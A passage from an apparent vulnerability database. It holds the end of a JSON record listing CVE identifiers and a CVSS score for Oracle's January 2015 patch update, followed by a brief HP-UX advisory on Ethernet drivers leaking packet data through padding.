"CVE-2011-3389", "CVE-2013-1741", "CVE-2014-6583", "CVE-2014-6597", "CVE-2014-4279", "CVE-2004-0230", "CVE-2015-0369", "CVE-2014-6525", "CVE-2015-0372", "CVE-2014-6582", "CVE-2015-0378", "CVE-2015-0392", "CVE-2015-0416", "CVE-2014-6587", "CVE-2013-1740", "CVE-2013-6438", "CVE-2015-0406", "CVE-2015-0401", "CVE-2014-6569", "CVE-2014-3470", "CVE-2012-0053", "CVE-2013-1739", "CVE-2014-6599", "CVE-2014-1492", "CVE-2013-2877", "CVE-2015-0417", "CVE-2015-0404", "CVE-2013-6450", "CVE-2013-5606", "CVE-2014-0114", "CVE-2015-0364", "CVE-2014-0050", "CVE-2010-5107", "CVE-2011-3368", "CVE-2014-6573", "CVE-2014-1490", "CVE-2010-5298", "CVE-2013-4286", "CVE-2015-0371", "CVE-2014-6526", "CVE-2015-0382", "CVE-2014-1568", "CVE-2015-0363", "CVE-2014-6600", "CVE-2014-6580", "CVE-2014-6509", "CVE-2015-0375", "CVE-2015-0414", "CVE-2014-0195", "CVE-2015-0413", "CVE-2014-6593", "CVE-2014-0198", "CVE-2014-6601", "CVE-2014-6594", "CVE-2015-0373", "CVE-2015-0421", "CVE-2013-2186", "CVE-2014-3567", "CVE-2014-6581", "CVE-2014-0015", "CVE-2015-0403", "CVE-2014-6570", "CVE-2015-0408", "CVE-2015-0429", "CVE-2014-6596", "CVE-2014-6521", "CVE-2015-0374", "CVE-2014-6591", "CVE-2014-6586", "CVE-2014-6524", "CVE-2014-6572", "CVE-2015-0370", "CVE-2015-0412", "CVE-2015-0400", "CVE-2015-0409", "CVE-2015-0387", "CVE-2015-0389", "CVE-2015-0399", "CVE-2014-0118", "CVE-2015-0415", "CVE-2014-6590", "CVE-2015-0376", "CVE-2014-6481", "CVE-2015-0393", "CVE-2015-0366", "CVE-2015-0419", "CVE-2014-6568", "CVE-2015-0377", "CVE-2015-0394", "CVE-2015-0397", "CVE-2015-0384", "CVE-2014-6589", "CVE-2014-1491", "CVE-2014-6528", "CVE-2014-6588", "CVE-2014-6541", "CVE-2011-1944", "CVE-2015-0437", "CVE-2014-6514", "CVE-2014-0117", "CVE-2014-4212", "CVE-2015-0436", "CVE-2014-6598", "CVE-2015-0367", "CVE-2014-0226", "CVE-2013-1620", "CVE-2013-4545", "CVE-2015-0426", "CVE-2015-0434", "CVE-2014-0221", "CVE-2015-0411", "CVE-2015-0381", "CVE-2014-6577"], "modified": "2015-01-20T00:00:00", "id": "ORACLE:CPUJAN2015-1972971", "href": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}

HP-UX PHNE_28636 : HPSBUX0305-261 SSRT3451 Potential Security Vulnerability in HP-UX network drivers (Data Leakage) (rev. 01)

Description

s700_800 11.00 EISA 100BT cumulative patch : Potential for Ethernet device drivers to reuse packet data for padding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.

s700_800 11.00 EISA 100BT cumulative patch :

Potential for Ethernet device drivers to reuse packet data for padding. Cross-reference: CERT/cc VU#412115 and CVE CAN-2003-0001.